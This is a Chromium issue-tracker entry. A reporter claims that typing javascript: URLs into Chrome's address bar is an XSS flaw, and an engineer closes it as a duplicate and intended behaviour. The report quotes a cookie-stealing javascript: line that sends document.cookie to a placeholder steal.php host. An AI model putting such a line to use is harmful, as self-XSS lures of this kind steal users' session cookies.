New issue
Advanced search Search tips

Issue 737651 link

Starred by 1 user
Status: Duplicate
Merged: issue 722080
Owner: ----
Closed: Jun 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: xss in all google chrome browser

Reported by morell...@gmail.com, Jun 28 2017 


VULNERABILITY DETAILS and simple Case
the vulnerability is in google chrome address bar.
It allows to execute xss,(javascript code) and get sensitive data like a cookies.
Running the javascript code you can get the data of the site you are visiting at that time
The following images explain better.
In this screenshot i get cookie with javascript:alert(document.cookie).
but with a comand like javscript:document.location="http://webiste.com/steal.php?cookie="+document.cookie
could steal cookies of users

VERSION
Chrome Version: [58.0.3029.110] 
Operating System: [mac os sierra 10.12.5, android 4.4.2]
Schermata 2017-06-28 alle 19.56.03.png
2.9 MB View Download
Schermata 2017-06-28 alle 19.56.06.png
2.8 MB View Download
Schermata 2017-06-28 alle 19.57.24.png
1.8 MB View Download

Comment 1 by elawrence@chromium.org, Jun 28 2017

Mergedinto: 722080
Status: Duplicate (was: Unconfirmed)
This is working as intended; running JavaScript manually in pages you've loaded is not a security vulnerability.

https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-

Comment 2 by morell...@gmail.com, Jun 29 2017 

but it is a self xss attack, could be dangerous with a bit of social engineering
Project Member

Comment 3 by sheriffbot@chromium.org, Oct 5 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment